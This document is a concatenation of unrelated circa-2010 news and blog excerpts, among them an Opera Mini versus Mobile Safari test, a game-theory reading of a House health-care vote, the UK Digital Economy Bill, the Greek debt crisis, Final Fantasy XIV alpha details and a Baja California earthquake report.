This morning Apple surprised everyone by approving the Opera Mini web browser for the iPhone and iPod touch , bringing one of the most popular mobile browsers to the most popular smartphone .
So how does it stack up ?
Advertisement
First of all , it 's worth pointing out that Opera Mini has one big roadblock for iPhone and iPod touch users :
Apple does n't allow you to set any other application as the default for web browsing , so if you 're opening links from other applications , like Mail , you 'll still launch Mobile Safari when you click that link .
( To use Opera Mini , you 'd have to copy the link , close Mail , open Opera Mini , and paste the link . )
That 's a pretty big hurdle , but it's not the end of the world , especially since more and more apps display links in - app unless you explicitly choose to open a link in Safari .
All that aside , you probably still open Safari directly when you want to do a lot of basic web browsing , so nothing 's standing in the way of just launching Opera Mini in those instances instead .
Advertisement
So let 's talk speed and performance .
I do n't have all the same options for testing these as we have when we do our normal browser performance tests ( most notably , memory use is missing , but since multitasking is n't on the iPhone yet anyway , that does n't much matter ) , but we 'll try to tackle as many of the same tests as we can .
( Also like our other performance tests , these are n't exactly scientific , but we do follow our own set of guidelines to get as accurate of results as we can on limited equipment .
For these tests , I 'm using my iPhone 3G . )
Browser Boot Up / Load Time ; Split Decision ...
Probably Mobile Safari
This is a little bit of a tricky category .
What I found when pitting the two against each other in launch time is that , while the Mobile Safari took significantly longer to launch from a cold start — that is , after having rebooted my iPhone entirely — it apparently resides in the iPhone 's system memory from that point forward , meaning subsequent launches are nearly instantaneous .
Opera , on the other hand , had a better cold startup time , but it does n't have the benefit of sitting in the system memory , so every launch for Opera Mini is a " cold " launch .
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
Page Load Time ; Winner : Opera Mini
To measure page load times , I timed five or so page loads on several popular sites over Wi -Fi , threw out the highest and lowest for each site , and then averaged them all out .
In this category , Opera Mini absolutely pummeled Mobile Safari , especially on full versions of web sites like the New York Times front page ( which partially rendered in Mobile Safari before it finished loading , but continued loading for over 40 seconds time and again ) .
Advertisement
JavaScript , DOM , CSS Speed ; Winner : Mobile Safari
We used Mozilla 's very cool Dramaeo browser performance testing tool to pit Mobile Safari's JavaScript , DOM , and CSS chops against Opera Mini's .
Unfortunately , we learned pretty quickly that , while Mobile Safari slowly chugged through the test ( slowly compared to desktop browsers , that is ) , Opera Mini failed to run with any of them .
Advertisement
That 's not necessarily a huge black mark against the speed of Opera Mini , per se , since we could n't actually pit the two against each other , but it speaks pretty loudly about which browser is currently capable of offering a more desktop - like experience , and that 's Mobile Safari .
Keep in mind that we 're not saying that a more desktop - like experience is necessarily preferable ; you 're on a mobile device , after all , and that desktop performance does seem to come with some trade - offs — like the page load times mentioned above .
Advertisement
Takeaway
It 's pretty clear that , while Opera Mini features seriously impressive page load times , it 's still behind Mobile Safari on several levels — some of its disadvantages are due to Safari 's advantaged position as the system default , some of them probably have more to do with the youth of Opera Mini on the iPhone platform .
You will , however , notice the considerably faster page loads when you 're using Opera Mini , and with the web , speed is everything .
If Opera could keep the speed and fix some of the rough edges , it could be really impressive .
Advertisement
Speed aside , use Opera Mini for a while and you 'll quickly miss the smooth zooming of Mobile Safari and the nice font rendering .
( When you 're looking at a desktop version of a site zoomed all the way out on Opera Mini , the type renders as big blocks of color and is generally unreadable . )
Advertisement
( Click the image above for a closer look . )
Still , I 'm holding out hope for Opera Mini .
The speedy page loads alone make it an ideal browser for a quick lookup , and its tabbed browsing interface is , in my opinion , superior to Mobile Safari's .
Advertisement
If you 've been kicking the tires on Opera Mini since its release this morning , let 's hear how its measuring up for you in the comments .
Earlier this month Crispen Glover explained all about remaking history as Thomas Edison with John C. Reilly , who played Nikola Tesla , on Drunk History .
Watch the first clips from this segment , and learn about why Edison was such a dick .
Advertisement
WARNING there is vomit in this at about 4:00 , but then he calls Tesla the " electric Jesus " so power through :
Basically on " Drunken History , " the crew gets a narrator insanely drunk and then ask them to retell historical events , which famous actors later act out .
The web hit and Sundance short winner is now on HBO 's Funny or Die TV series .
Image Credit : Justin Stephens / FoxDavid Cross , that Fünke everyone ’s been talking about , candidly addressed the long - rumored Arrested Development movie during an interview with TV Squad .
Presumably not in the voice of Mrs. Featherbottom , Cross said , “ Way too much time it ’s been [ since the show ended ] .
I mean , there ’s so many people involved .
Everyone ’s doing their own thing , you know .
And everybody ’s aged .
It ’s just not going to happen .
I ’m sure I speak for everybody when I say we ’d love for it to happen , we ’d love to work on it , but just I do n’t think … not going to happen . ”
Karen Tumulty at the Time blog Swampland perceptively writes :
“ the easiest choice for endangered Democrats in swing districts is to vote against the bill–but only if it passes .
That ’s because they need two things to happen to get re-elected this fall .
They need to win independent voters ( who in most recent polls , such as this one by Ipsos / McClatchy , are deeply divided on the bill ) .
But they also need the Democratic base in their districts to be energized enough to turn out in force–something that is far less likely to happen if Barack Obama ’s signature domestic initiative goes down in flames . ”
Tumulty compares the scenario to an earlier vote in 1993 on the Clinton economic plan :
“ It was the night of August 5 , 1993 , and Bill Clinton was one vote short of what he needed to get his economic plan through the House–a vote he got , when freshman Marjorie Margolies - Mezvinsky switched hers .
The other side of the Chamber seemed to explode .
Republicans pulled out their hankies and started waving them at her , chanting : “ Bye - bye , Margie . ” Margolies - Mezvinsky learned the hard way that they were right .
Her Main Line Philadelphia district was the most Republican - leaning of any represented by a Democrat in Congress .
She had sealed her fate : During her campaign , she had promised not to raise taxes , and the budget proposed a hike in federal taxes , including a gasoline tax .
On the day of the vote , she appeared on television and told her constituents that she was against the budget .
Minutes before the vote , however , on August 5 , 1993 , President Clinton called to ask Margolies - Mezvinsky to support the measure .
She told him that only if it was the deciding vote — in this case , the 218th yea — would she support the measure .
“ I was n’t going to do it at 217 .
I was n’t going to do it at 219 .
Only at 218 , or I was voting against it , ” she recalled .
11 She also extracted a promise from Clinton that if she did have to vote for the budget package , that he would attend a conference in her district dedicated to reducing the budget deficit .
He agreed ( and later fulfilled the pledge ) .
Nevertheless , Margolies - Mezvinsky told Clinton “ I think I ’m falling on a political sword on this one . ”
Tumulty suggests the underlying game is the Prisoner ’s Dilemma .
Some of her commenters suggest the game is similar to the free - rider problem in provision of public goods .
The free - rider problem is very similar to a Prisoner ’s Dilemma so really the commenters are echoing her interpretation though they may not realize it .
I claim the interesting version of the game for Democratic Representatives in conservative districts is Chicken .
Two cars race towards each other on a road .
Each driver can swerve out of the way or drive straight .
If one swerves while the other does not , the former loses and the latter wins .
If neither swerves , there is a terrible crash .
If both swerve , both lose .
A variant on this game is immortalized in the James Dean movie “ Rebel without a Cause ” .
According to Tumulty , Democratic Representatives in conservative districts want to have their cake and eat it : they need healthcare reform to pass to get Democratic turnout but they want to vote against it to keep independents happy .
The strategic incentives are easy to figure out in two scenarios .
First , suppose the bill is going down however the Rep votes as it does not have enough votes .
Then , this Rep should vote against it – at least they get the independents in their district .
Second , suppose the bill is going to pass however the Rep votes – they should vote against via the Tumulty logic .
The third scenario is ambiguous .
Suppose a Rep ’s vote is pivotal so the reform passes if and only if she votes for it .
At the present count with retiring Reps , Pelosi needs 216 votes to pass the Senate bill in the House so a Rep is pivotal if there are 215 votes and her vote is the only way the bill will pass .
Margie M-M was in this position in 1993 .
There are two possibilities in the third scenario .
In the first , the Rep wants to vote against the bill even when she is pivotal as she is focused on the independent vote .
This means she has a dominant strategy to vote against it the bill .
This case is strategically uninteresting and , as in the Margie case , it is implausible for all the undecideds to have a dominant strategy of this form .
So let ’s turn to the second possibility – many undecideds Rep wants to vote for the bill if they are pivotal .
This generates Chicken .
If none of the conservative Democratic Reps vote for it , the bill goes down and its a disaster as Democratic voters do not turn out .
This is like cars crashing into each other in Chicken .
Your ideal though is if someone else votes for it ( i.e swerves ) in the pivotal scenario and you can sit on the sidelines and vote against it ( drive straight ) .
There is a “ free - rider ” problem in this game as in the Prisoner ’s Dilemma .
But there is a coördination element too – if you are the pivotal voter you do want to vote for the bill .
Chicken has asymmetric equilibria where one player always swerves and the other drives straight .
This corresponds to the case where the conservative Democrats know which of them will fall on their swords and vote for the bill and the rest of them can then vote against it .
This is the best equilibrium for Obama as the Senate Bill definitely passes the House .
But there is a symmetric equilibrium where each conservative Rep ’s strategy is uncertain .
They might vote for it , they might not .
There is no implicit or explicit coördination among the voters in this equilibrium .
This equilibrium is bad for Obama .
Sometimes lots of people vote for the bill and it passes with excess votes .
But sometimes it fails .
There is lots of strategy involved in trying to influence which equilibrium is played .
And there ’s lots of strategy among the Reps themselves to generate coordination .
If you can commit not to vote for the bill , Obama and Pelosi are not going to twist your arm and they ’ll focus on the lower - hanging fruit .
Commitment is hard .
You can make speeches in your district saying you ’ll never vote for the bill .
Margie M-M did this but a call from the President persuaded her to flip anyway .
Republicans are going to emphasize the size of the independent vote to convince the undecideds that they have a dominant strategy to vote against the bill .
And the President is going to hint he ’s not going to help you in your re-election campaign if you vote against the bill .
Etc. , etc .
So , if the Senate bill is finally voted on , as we creep up to 200 votes or so , we ’ll see Chicken played in the House .
We ’ll see who lays an egg .
Please turn on JavaScript .
Media requires JavaScript to play .
Advertisement Ministers have been accused of a " stitch - up " to pass laws cracking down on digital piracy before the election .
MPs voiced anger at the digital economy bill - aimed at supporting artists ' copyright and tackle illegal file - sharing - being rushed into law .
Former minister Tom Watson had argued it would be a " catastrophic disaster " if the bill was passed as constituted .
However , the bill was approved by MPs by a majority of 142 votes and it passed through the Lords on Thursday .
The legislation was one of more than 10 bills being considered by parliamentarians in the " wash - up period " - the remaining time before the legislature is dissolved .
Parliament was prorogued late on Thursday afternoon , meaning any bills that had not been passed would fail to become law .
' Repercussions '
Under the terms of the Digital Economy Bill , internet service providers will be obliged to send letters to any of their subscribers linked to alleged infringements .
Copyright holders will be able to apply for a court order to gain access to the names and addresses of serious infringers and take action against them while ISPs would be able to suspend accounts of offenders .
Hundreds of millions of pounds every year is currently haemorrhaging from our creative industries because of unlawful file - sharing
Ben Bradshaw
Culture secretary UK votes to ban ' vulture funds '
Mr Watson had expressed concern this could lead to innocent internet users being caught simply since they lived in the same building as infringers .
" There might be a deal with the Tory front bench and the Lib Dem front bench but there are 20,000 people who have taken the time to e-mail their MPs about this in the last seven days alone , " Mr Watson said of the proposals .
" They are extremely upset that this bill will not have the scrutiny it deserves and requires . "
Labour MP Kate
Hoey complained the bill was being pushed through by a " stitch - up " between leaders of the three main parties .
And she added : " The reality is out there , the ordinary person who has only begun , many of them , to realise the repercussions of this bill are going to feel totally let down by Parliament . "
Ministers had made a number of earlier concessions in order to assuage the concerns of MPs .
Combing through Twitter , I found only one apparent supporter of the bill
Rory Cellan- Jones
BBC digital election correspondent
Read Rory 's thoughts in full Send us your comments Restrictions on the activities of persistent copyright offenders will not come into force for a year and only on the basis of clear evidence of their activities .
A clause on " orphan works " - material where the author was impossible to identify - was also dropped after opposition from photographers .
Another proposal allowing politicians to block pirate websites without primary legislation was replaced with an amendment which lets ministers " make provision about the granting by a court of a blocking injunction " .
Google , which has repeatedly voiced opposition to the plans to block websites , said the bill had " escaped proper scrutiny " .
" We absolutely believe in the importance of copyright , but blocking through injunction creates a high risk that legal content gets mistakenly blocked , or that people abuse the system , " a spokesman added .
' Not victimless '
The next Parliament will be able to study the most contentious aspects of the bill before they are enacted and there will be an extended period of public consultation .
Culture Secretary Ben Bradshaw said the legislation struck the right balance between giving creative artists more protection and giving consumers a " fair deal " .
" Hundreds of millions of pounds every year is currently haemorrhaging from our creative industries because of unlawful file - sharing .
" This is not a harmless or victimless activity .
It deprives our musicians , writers and film makers and other artists of their livelihoods and if we do n't do something about it , it will pose a serious threat to our creative sectors and Britain 's leadership in them . "
People are taking someone else 's talent , time , effort and ability and not paying for it
Feargal Sharkey
UK Music chief executive The Conservatives said the bill , as it stood , was an " Amstrad " when " we wanted an IPod " .
For the Lib Dems , Don Foster said it was a " disgrace " that a bill of such complexity was being given so little time for debate .
Jim Killock of the Open Rights Group said the legislation was an " an attack on everyone 's right to communicate , work and gain an education " .
The phone and broadband company Talk Talk said the revised bill was " in much better shape " but still contained " many draconian proposals " .
The Pirate Party UK - which campaigns for the legalisation of non-commercial file sharing - said the passage of the bill marked " a sombre day for Britain 's digital future " .
However , UK Music chief executive Feargal Sharkey - former lead singer with the Undertones - said action was needed to stop pirates .
He told BBC Breakfast : " People are taking someone else 's talent , time , effort and ability and not paying for it , and doing it without their permission .
" And quite clearly that 's just wrong , and we need to try and do something to stop it . "
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
The Greek debt crisis broke out anew in recent days amid worries that Greece will not be able to overcome public opposition to deep budget cuts while support from the European Union remains wobbly and depositors appear to be staging a run on Greek banks .
The renewed crisis makes it likelier that Greece will need a bailout from the EU within weeks , analysts said , posing the first major test of the trading bloc ’s resolve to maintain unity in the face of immense fiscal problems in Greece and a long list of other member countries .
Greece ’s borrowing costs soared Thursday to a record 4.63 percentage points over the rates on German bonds , raising questions about whether Greece will be able to reduce its sky - high budget deficits even if it adheres strictly to deep budget cuts that have sent Greek citizens and labor unions into the streets in protest for weeks on end .
The beleaguered nation was pushed further against the ropes by an exodus of depositors from Greek banks in January and February and other bank funding problems that forced the country to exhaust funds it had set aside to shore up the banking system - leaving Greece with little wherewithal to address any further assaults on its teetering financial system .
Adding to Greece ’s woes , divisions reopened between Germany and other EU nations in recent days over the terms of aid they had pledged to provide Greece last month .
Germany continued to insist that any loans to Greece should carry interest rates close to market levels , to discourage Greece from seeking a bailout , while France and other EU members favored providing subsidies to reduce the financial strain .
Other questions surfaced about the concessions Greece would have to make in return for an International Monetary Fund ( IMF ) contribution to the backup financing plan .
“ It ’s another Greek blowout , ” said Mark Frey , an analyst at Custom House , a Canadian foreign exchange firm , noting that the drama and complications surrounding the Greek financial tragedy are getting more tangled and histrionic by the day .
“ The much - ballyhooed EU and IMF partnership cobbled together seemingly at the last minute in order to provide a backstop to Greece and lower the heavily indebted nations borrowing costs is unraveling , with more than a few eyebrows being raised at how we got to this point , ” he said .
“ If a workable financing arrangement cannot be realized , the world is ultimately relying on Greece to enact painful fiscal austerity measures in an environment where the populace has been completely unwilling to accept that there is a significant problem to begin with , ” he said .
“ Furthermore , going the IMF route is likely to have spending restrictions that equate to political suicide and , as such , Greek politicians will want to avoid the IMF .
So , by no means have Greeces debt woes been resolved . ”
The EU / IMF backstop plan was originally designed last month to try to help stabilize Greek markets , thereby enabling Greece to keep borrowing on its own and addressing its own budget problems without a bailout .
“ Unfortunately , the eurozone bailout plan has failed to have the positive impact expected , ” said Diego Iscaro , an analyst at IHS Global Insight .
“ The situation in Greece continues to be extremely worrying . ”
Given the intransigence of the Greek problems - and the EU ’s inability thus far to convincingly address them - the crisis is beginning to spread again after a hiatus of several weeks , driving up the borrowing rates for similarly debt - strapped European countries such as Portugal , Ireland , Italy and Spain .
As in previous episodes , Greece ’s renewed woes drove down the euro Thursday close to its lowest point against the U.S. dollar this year .
Meanwhile , the value of the dollar and prices on U.S. Treasury bonds , where investors often stow funds during financial emergencies , increased .
The heightened support for U.S. assets enabled the U.S. Treasury to enjoy a successful auction of a heavy slate of securities this week .
“ With attention having turned to the Greek - yield explosion , we saw a flight to quality bid in Treasuries , ” and heavy buying of Treasuries by foreigners , said John Rocket Spinello , chief technical strategist at Jefferies Inc .
He expects the “ ongoing Greek saga ” to keep driving investment into U.S. markets while hurting the European currency and markets .
Adarsh Sinha , an analyst at Barclays Capital Research , said the threat to stability from a run on Greek banks may have been exaggerated .
Greek depositors , he said , may have decided that they can earn more by putting their money in Greek government bonds offering interest rates of more than 7 percent .
“ It might be that these deposits are being moved to foreign banks , but it could also be that they are being put to work in some way , ” he said .
“ Clearly , such deposit - flight stories can be self - fulfilling . ”
And in any case , Greek banks likely are offsetting flows of deposits into Greek government bonds by cashing in some of their own Greek bond investments to pay off the depositors .
“ Fears about a vicious circle developing will likely remain alive , ” and ultimately may force Greece into the arms of the EU and IMF , he said .
But the cost of IMF involvement will no doubt be high .
“ Previous experience suggests that the IMF would prefer a larger upfront fiscal adjustment from Greece - in exchange for large upfront financing - that could include concrete commitments on such contentious areas as pension reform , ” he said .
Barclays estimates that Greece will need a three - year joint IMF / EU package totaling 40 to 45 billion euros as the “ minimum needed ” to “ calm markets sufficiently ” so that Greece can continue to slowly overcome its budget and financial problems .
Sign up for Daily Newsletters Manage Newsletters
Copyright © 2020 The Washington Times , LLC .
Click here for reprint permission .
First Bear Hunt in New Jersey Since 2005 Scheduled
Trenton , NJ –-( AmmoLand.com ) -
Last week , the New Jersey Fish and Game Council unanimously approved a bear management policy that includes a six day bear hunt , beginning December 6 2010 .
Acting Department of Environment Commissioner Bob Martin has signed off on the policy , thereby opening up the first bear hunt in New Jersey since 2005 .
Of course , Wayne Pacelle , CEO of the anti-hunting , Humane Society of the United States issued a statement calling the Black Bear Management Policy a political maneuver with no compelling social or biological reason for repealing the ban .
Mr. Pacelle fails to mention how in 2005 former Governor Jon Corzine ( D ) chose to disregard Fish and Game Council ’s advice and imposed the bear hunting ban for political reasons .
Governor Corzine then stood by in 2007 and tacitly allowed a bill to pass out of an Assembly Committee designed to remove sportsmen from the New Jersey Fish and Game Council , replacing them with environmental activists .
Unfortunately for Mr. Pacelle , Commissioner Bob Martin knows that wildlife policy should not be rooted in politics or emotion , but sound science and stated that ,
“ The council incorporated the latest research and science into its proposed black bear management policy … , ” contradicting Mr. Pacelle ’s claim .
A public hearing on the plan will be held May 11 in Trenton and final approval should come from the state following a 60 day public comment period , beginning April 19 .
NRA -ILA will notify you on AmmoLand.com once a time and location in Trenton has been set .
Late on the night of April 20th , 50 miles from the shore of Louisiana , a fire broke out aboard the Transocean Deepwater Horizon oil rig under lease by BP , with 126 individuals on board .
After a massive explosion , all but 11 of the crew managed to escape as the rig was consumed by fire , later collapsing and sinking into the Gulf .
Safeguards set in place to automatically cap the oil well in case of catastrophe did not work as expected , and now an estimated 5,000 barrels ( over 200,000 gallons ) of crude oil is pouring into the Gulf of Mexico every day - and could possibly continue to do so for months as complicated efforts are made to stop the leak .
Collected here are several recent photos of the developing situation along Louisiana 's Gulf Shore - one with the potential to eclipse the 1989 Exxon Valdez oil spill in scope and damage .
( 32 photos total
When Ken Lewis retired from BofA , he left with $ 83 million in cash and benefits -- this despite costing Bank of America shareholders more than $ 150 billion in recent years .
According to a filing found by the Wall Street Journal on Friday , the former CEO was paid $ 4.2 million for the year 2009 and he's also eligable for the following :
$ 57 million in pension benefits
about $ 11 million in deferred compensation
$ 4.6 million in vested and unvested stock
he also left with a life - insurance policy valued at $ 10.3 million
Two other Bank of America executives also did extremely well .
Greg Curl took home $ 10.5 million and Thomas Montag raked in a whopping $ 29.9 million .
Rival banks Goldman Sachs and JP Morgan paid their CEOs $ 9 million and $ 17 million .
It 's worth noting that Ken Lewis almost singlehandedly cost Bank of America shareholders about $ 150 billion .
In 2005 , before the peak of the housing bubble and financial crisis , Bank of America and JP Morgan were both trading at about $ 50 a share .
JP Morgan has since recovered almost all the market value it lost in the intervening years , mainly because Jamie Dimon insisted on paying distressed prices for the assets he bought during the crisis ( and getting Federal guarantees ) .
Ken Lewis , meanwhile , swept in and paid way too much for Countrywide and Merrill Lynch , decisions that he was almost singlehandedly responsible for .
These two deals are the main reason that Bank of America is trading at $ 16 .
Netanyahu and Dagan
On Sunday ( January 9 2011 ) , Yediot ’s Itamar Eichner reported [ emphasis mine ; full translation here ] :
Prime Minister Binyamin Netanyahu is furious with outgoing Mossad Director Meir Dagan because of the briefing Dagan gave journalists last Thursday .
In the course of that briefing , Dagan shared with the reporters the Mossad ’s assessment that the Iranians would be unable to develop a nuclear bomb before 2015 .
Yedioth Ahronoth has learned that Dagan ’s statements infuriated Netanyahu , who advocates taking an aggressive approach vis -à - vis Iran .
According to a high - ranking political official , Netanyahu reprimanded Dagan and said that his statements had undermined Israel ’s efforts to fight against the Iranian nuclear program by means of the international community .
In an op - ed published on the same day , Sever Plocker , a senior editor at the paper , expresses wonder at the scant attention Dagan ’s statement recieved [ full translation and Hebrew original at the bottom of this post ] :
One of the most historically important statements to have been made in the past ten years in the State of Israel made headlines in the Israeli media on Friday for a single day .
It elicited a few reactions and a few brief analyses — and disappeared .
Plocker , hardly a knee - jerk leftist ( see this recent critique of the Israeli left and the prospects for peace with the Palestinians , for example , ) explains the drama [ emphasis mine ] :
Dagan , a suspicious super - cautious individual who routinely prefers to err on the side of pessimism …
The Iranian nuclear threat died .
It keeled over .
Because , if the director of the State of Israel ’s Mossad is prepared to risk saying that Iran wo n’t have even a single nuclear bomb “ at least until 2015 , ” that means that Iran is not going to have a nuclear bomb .
Period .
He also helps us understand Netanyahu ’s is fury [ emphasis mine ] :
For more than a decade , Israel has been living under the thickening cloud of the Iranian nuclear bomb .
The military , economic and even the social agendas in Israel have been directly influenced by it .
The election of Netanyahu as prime minister ( and Barak ’s joining the coalition ) were explained by the need to place at the head of the state and the security establishment people who would be capable of leading the people and the army in this decisive year in dealing with Iran .
From time to time , in light of the foolish things that the two of them have done , public opinion was asked to be forgiving of them because of the weight of the Iranian threat that lay on their shoulders .
The op - ed ends with a call to move on :
Dagan ’s statement about the lifting of the Iranian nuclear threat frees Israel from the clutches of a nightmare that we were either conscious of or not , but which cast a giant black shadow over all of us .
Farewell , Iranian bomb .
In your absence , the time has ripened to place other issues at the top of our agenda .
And there is no lack of other issues .
Indeed , Israel ’s diplomatic isolation and the rapid evaporation of what remains of its democracywould be a good place to start .
Though we have n’t been lucky enough to score invites to the Final Fantasy XIV alpha test , today we received an insider tip with some early info on the game and some screens from the online alpha manual .
Included in the manual were new details on the experience and skill leveling up systems and teleportation around the world of Eorzea .
We ’ve heard previously that a player ’s class in FFXIV is determined by whatever weapon they have equipped , but the alpha manual reveals some new details on this system .
Characters will gain “ physical levels ” the way most MMO players are used to -- by gaining experience points , which currently is only done through killing monsters .
“ Skill ranks ” are separate for each weapon / tool type and are raised by use in combat or crafting .
Both physical levels and skill ranks are capped at 20 for the alpha .
According to the manual , the current version of the game contains nine different weapon or tool types ( and , as such , nine different classes ) : swords , hand - to - hand weapons , axes , polearms , bows , conjurer arms , thaumaturge arms , hammers , and pickaxes .
There ’s no barehanded fighting allowed ; players must have a weapon or tool equipped at all times .
Also , if you ’ve got a hammer equipped for smithing or a pickaxe for mining , do n’t plan to battle enemies -- with those weapons equipped , you ’ll only be able to throw stones during the alpha .
Though the manual does n’t reveal a ton of new information on Final Fantasy XIV , there are some interesting tidbits .
We knew that crystals ( in the form of “ Aetheryte ” ) would be important to the game world , but the manual explains how they are used for teleporting .
Basically , you ’ll be able to find an Aetheryre Crystal in most towns .
Using it will restore your HP and MP , add the location to your teleport list , and set the crystal as your home point .
You ’ll also have the option to begin any “ levequests ” available at that crystal .
“ Aetherial Gates ” located around the world will allow you to refill your HP and MP and can be set as your home point but will not allow for normal teleporting .
Finally , “ Aetherial Nodes ” will appear after completing a levequest , allowing you to instantly warp back to your home point and turn in the quest .
Want to return to your home point or teleport somewhere else while wandering Final Fantasy XIV 's massive world ?
Square - Enix is apparently set on making that as simple as possible .
At any point while you ’re not in combat , you can open your menu and click the “ Return ” button to go to your home point .
Likewise , opening the menu and hitting “ Teleport ” will allow you to choose to warp to any Aetheryte Crystal you ’ve previously visited .
Using the Teleport option will even send a notice to others in your party asking them if they ’d like to teleport with you .
As far as the manual mentions , there is no cooldown to either of these options , meaning you should be able to jump around the world freely whenever you want .
Although this could change before the game hits its final form , it would make Final Fantasy XIV into one of the most user - friendly MMOs around just by virtue of letting players get around the world quickly .
As with any MMO alpha or beta , any of these early systems could change dramatically before Final Fantasy XIV is released , but Square - Enix is looking specifically at the battle system , controls , and user interface with this first round of testing .
The alpha begins this Thursday , April 8 , and we ’ll let you know if we dig up any more juicy details .
We 've also contacted Square - Enix to confirm the details we were given , and we 'll update if they have any comments or additions .
In the mean time , check out these screens from the manual .
Aetheryte Crystals serve as home camps , teleport locations , and handy HP / MP restoration spots
Aetherial Gates provide some of the bonuses of Crystals but cannot be teleported to
Aetherial Nodes pop into existence upon completion of a levequest , allowing a quick return to town
1. Region title
2. Area title
3. Camp title
4. Aetheryte Crystal location
5 . Player location
6. Aetherial Gate location
7 . Map menu button
These two characters have formed a party
Surprise !
Final Fantasy XIV includes a trade system
In addition to regular trading , players can set up bazaars where other characters can walk up to them and purchase items
1. Character name
2. Minimap
3. Chat log
4. Character status
5. Connection status
1. Action bar
2. Action gauge
3. Effect gauge
Oh , those crazy WW1 pilots and their wacky shenanigans .
The BBC 's director of television Jana Bennett has claimed that budget cuts will have no impact on Doctor Who .
Speaking to The Mirror , Bennett explained that she is not prepared to compromise on the quality of the show .
" We know audiences love Doctor Who and are pleased with the new Doctor but we have to make good use of our money because it is public money , " she said .
" We try to make savings so we can invest in other programmes .
The one thing we do n't cash in or trade off is quality .
If you look at Doctor Who now , with the amazing new title or the new Tardis itself inside , the quality on screen is really terrific and ambitious . "
She added : " We are squeezing the budget but pushing really hard .
I absolutely want to be a guardian of quality as a person in charge of BBC television . "
Bennett also praised the new Doctor Matt Smith and his companion Karen Gillan , saying : " [ They ] are both shaping up to be big stars of the weekend schedule . "
Doctor
Who showrunner Steven Moffat has recently claimed that the budget cuts forced him to be more creative .
This content is created and maintained by a third party , and imported onto this page to help users provide their email addresses .
You may be able to find more information about this and similar content at piano.io
BAGHDAD — An Iraqi election to choose the country 's next leader and help shape the U.S. role here for the next four years opened Thursday to deadly violence and fraud claims .
Early balloting began for hundreds of thousands of Iraqis , including police and military who will be on duty Sunday , the main voting day in Iraq 's second general election since the ouster of Saddam Hussein .
The ...
He bursts in and out of parties , at once manic and serene , chronically toting gifts , cards and flower arrangements that seem to consume much of an annual income that is believed to exceed $ 250,000 .
Allen — who is childless and owns no cars or real estate — perpetually picks up meal and beverage tabs for his friend - sources ( the dominant hybrid around Mikey ) .
He kisses women ’s hands and thanks you so much for coming , even though the party is never at his home , which not even his closest friends have seen .
It is as if Mikey is the host of one big party , and by showing up anywhere in Washington , you have served the Playbook community and are deserving of the impresario’s thanks ( or “ Hat Tip ” in Playbookese ) .
Allen also has a tendency to suddenly vanish .
But then he will pop up on a TV screen a few minutes later .
Or you then learn via e-mail that he is racing through O’Hare or via Playbook that he took an excursion to the circus ( with “ Owen and Grace Gallo , ages 3 and 4 , who especially liked : doggies on a slide ” ) or Maine ( “ where an eagle might grab one of your fish while you ’re focused on the grill ” ) .
Or that it ’s Mark Paustenbach ’s birthday , whoever he is .
Allen was the first reporter hired by Politico ’s founding editors , John F. Harris and Jim VandeHei , when they left The Washington Post to start the Web site and newspaper in 2006 .
He is considered a Politico “ founding father , ” in the words of Harris , who , like VandeHei , tends to place great weight and mission onto the organization .
Another construct ( originating outside Politico ) is that Harris and VandeHei are God and Jesus — it ’s unclear who is who — and that Allen is the Holy Ghost .
When I mentioned this to Allen recently , he was adamant that it is meant to be facetious and that no one at Politico really believes that .
Allen , an observant Christian , said the line could be misconstrued .
But “ Holy Ghost ” does seem a particularly apt description of Allen ’s ubiquity and inscrutability .
“ I get that what I do is a little elusive , ambiguous , ” Allen told me .
“ I try to be a force for good .
And I try to be everywhere . ”
I met Allen on a hot April night at the basement bar of the Hay - Adams hotel , across from the White House .
I headed downstairs , and there he was , startling me in a back stairwell , reading his BlackBerry an inch from his wire - rim glasses .
As we entered the bar , Allen greeted two Democratic operatives at a corner table and noted that his friend - source Kevin Madden , a Republican consultant , was at that moment on CNN .
Allen ’s public bearing combines the rumpledness of an old - school print reporter with the sheen of a new - school “ cross - platform brand ” who has become accustomed to performing on camera .
Every time Allen starts to speak — in person or on air — his eyes bulge for a split second , as if he has just seen a light go on .
His mannerisms resemble an almost childlike mimicry of a politician — the incessant thanking , deference , greetings , teeth - clenched smiles and ability to project belief in the purity of his own voice and motivations .
He speaks in quick and certain cadences , on message , in sound bites , karate - chopping the table for emphasis .
( His work is “ joyful , exciting , ” he says .
It is a “ privilege ” to work at Politico with young reporters .
“ I love this company .
I love what I ’m doing . ”
And all that . )
Over several discussions , Allen repeated full paragraphs almost to the word .
“ The people in this community , they all want to read the same 10 stories , ” he said , table - chopping in the Hay - Adams .
“ And to find all of those , you have to read 1,000 stories .
And we do that for you . ”
As a practical matter , here is how Allen ’s 10 stories influence the influentials .
Cable bookers , reporters and editors read Playbook obsessively , and it ’s easy to pinpoint exactly how an item can spark copycat coverage that can drive a story .
Items become segment pieces on “ Morning Joe , ” the MSNBC program , where there are 10 Politico Playbook segments each week , more than half of them featuring Allen .
This incites other cable hits , many featuring Politico reporters , who collectively appear on television about 125 times a week .
There are subsequent links to Politico stories on The Drudge Report , The Huffington Post and other Web aggregators that newspaper assigning editors and network news producers check regularly .
“ Washington narratives and impressions are no longer shaped by the grand pronouncements of big news organizations , ” said Allen , a former reporter for three of them —
The Washington Post , The New York Times and Time magazine .
“ The smartest people in politics give us the kindling , and we light the fire . ”
LOS ANGELES — A powerful earthquake southeast of Tijuana shook Southern California on Sunday afternoon , damaging buildings in northern Mexico and border cities in California and Arizona and rattling a seismically sophisticated population as far north as Los Angeles and Las Vegas as chandeliers swayed , homes shook and the earth seemed to slide under the feet of people emerging from Easter church services for well over a minute .
The 7.2 - magnitude quake struck just after 3:30 p.m. local time , and was centered 16 miles southwest of Guadalupe Victoria in Baja California , Mexico , and about 110 miles southeast of Tijuana , said the United States Geological Survey .
Carlton Hargrave , 64 , was standing in the entryway of Family Style Buffet in Calexico , a California border town , when the quake hit .
His restaurant , he said in a telephone interview , was “ almost completely destroyed . ”
Image A man in Calexico , Calif. , swept up broken glass after a 7.2 magnitude earthquake struck on Sunday .
Credit ...
Sandy Huffaker / Getty Images
“ We ’ve got tables overturned , plates broken on the floor , the ceilings caved in , ” Mr. Hargrave said with a shaky voice over the sound of his feet crunching rubble and glass .
“ It was big .
I mean , it was major . ”
Tonight was one of those amazing , work til your eyes bleed kind of nights .
Not only have we all been pumped about the galaxy editor , but more so the fact that it 's supposed to be released this week .
